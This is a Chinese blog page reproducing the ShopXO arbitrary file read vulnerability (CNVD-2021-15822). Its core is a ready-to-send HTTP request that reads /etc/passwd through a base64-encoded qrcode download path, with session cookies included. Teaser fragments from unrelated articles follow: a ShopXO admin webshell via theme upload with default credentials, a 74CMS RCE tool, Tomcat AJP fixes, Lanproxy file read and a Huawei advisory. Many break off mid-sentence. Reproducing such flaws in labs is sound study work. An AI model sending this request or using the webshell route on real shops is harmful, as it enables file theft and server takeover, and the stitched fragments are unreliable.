shopxo 文件读取(CNVD-2021-15822)
漏洞介绍:
ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息
影响范围:
ShopXO版本
环境搭建:
在线环境
地址
漏洞复现:
进行burp抓包
将要访问的文件进行编码
构造poc
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:40398
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1635834194,1635834251; grafana_session=4ed2fe8aecc214c9bbb634d8399014fb; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640670569; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2229814a38-17f9-413d-ad48-e704ca23ede6%22; PHPSESSID=jskl7f1mghrjlvsc8d7ctlt4j6; SECKEY_ABVK=dZF+HPOlvzzkwiS3ULsWzkjw4oNoZP3kMhRN02hlMEI%3D; BMAP_SECKEY=a52c397851ec0df6cb484b1d2c453acc49624b58896cb16fca4c15a2a5a330f41d048e40401107e5d699a5592f90abea5c64379815179d8bc02cbfd533f1c2784e84874764b6b40a032b23dbff4e931ed7413db121a2b52266f9290f239991ecce81595bf8b1ec1c3add56d6d7a9d1b87690ec447ec7359de0c799eafbaff605e058b6494a4df2b0d9b55365d4e0a5a8f6b1e541f01e99cd55369bee3dcc7f4a4a21514067b0064068c73d6609ca9562f3eea532cb3189fee339388c1217e1fd5075f080068a7657f15896598309cee7485b7219a70ca86d2017448104c526a28b2c55819909c6bc522a500f62c70c80
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 2
访问,获得文件内容
漏洞修复:
根据官方进行下载补丁修复
shopxo 文件读取(CNVD-2021-15822)漏洞介绍:ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息影响范围:ShopXO版本环境搭建:在线环境 地址漏洞复现:访问首页进行burp抓包将要访问的文件进行编码构造pocGET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1...
渗透测试|shopxo后台全版本获取shell复现
启动靶机:
一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台的文件上传漏洞
知道了默认后台地址以及账号和密码:/admin.php | admin:shopxo
成功进入后台
左侧找到安装主题功能,然后到shopxo官网下载一个官方的主题模板,摸了一下主题模板的结构后发现可以把马插在压缩包的/主题名/_stati
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS < 6.0.48 远程命令执行漏洞利用工具源码内容
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
更多介绍请访问笔者博客:0xtlu.github.io
1.版本升级,截至2020-2-24,官方公布的已修复该漏洞版本包括:
Apache Tomcat 7.0.100Apache Tomcat 8.5.51Apache Tomcat 9.0.31
2.关闭AJPConnector:
修改conf/server.xml配置文件的,删除或注释掉这一行,修...
文章来源|MS08067 Web
安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://
cnvd.org.cn/flaw/show/
CNVD-
2021-49104
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备第一步 安装java环境第二步 下载proxy-server-0.1.zip,并放入/usr/local目录下第三步 访问网站漏洞复现修复建议摘抄
Lanproxy 任意文件读取漏洞复现
CVE-2021-3019
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)
本次Lanprox
CNVD-2020-49480 是一个针对华为云EasyDeploy产品的漏洞预警通知。该漏洞由华为云EasyDeploy平台中的一个组件Fabric在实现时存在代码逻辑不严谨的问题,攻击者可以通过构造恶意请求来绕过身份认证和授权机制,从而获取非法权限进而进行恶意操作,包括但不限于访问、修改、删除敏感数据等。
华为云EasyDeploy是一款云部署管理工具,旨在提供一站式的部署、管理和监控服务,方便企业快速上云。但由于该漏洞的存在,攻击者可以利用该漏洞访问该平台上运行的应用程序、数据等敏感资源,甚至可能造成重大的数据泄露和其他安全问题。
针对此漏洞,建议用户及时升级产品版本,以确保系统安全,避免造成不必要的安全风险和经济损失。同时,建议企业加强安全意识培训,定期进行安全评估和漏洞扫描,提前发现和解决安全问题,保障企业信息安全。
小白她不希望是小白: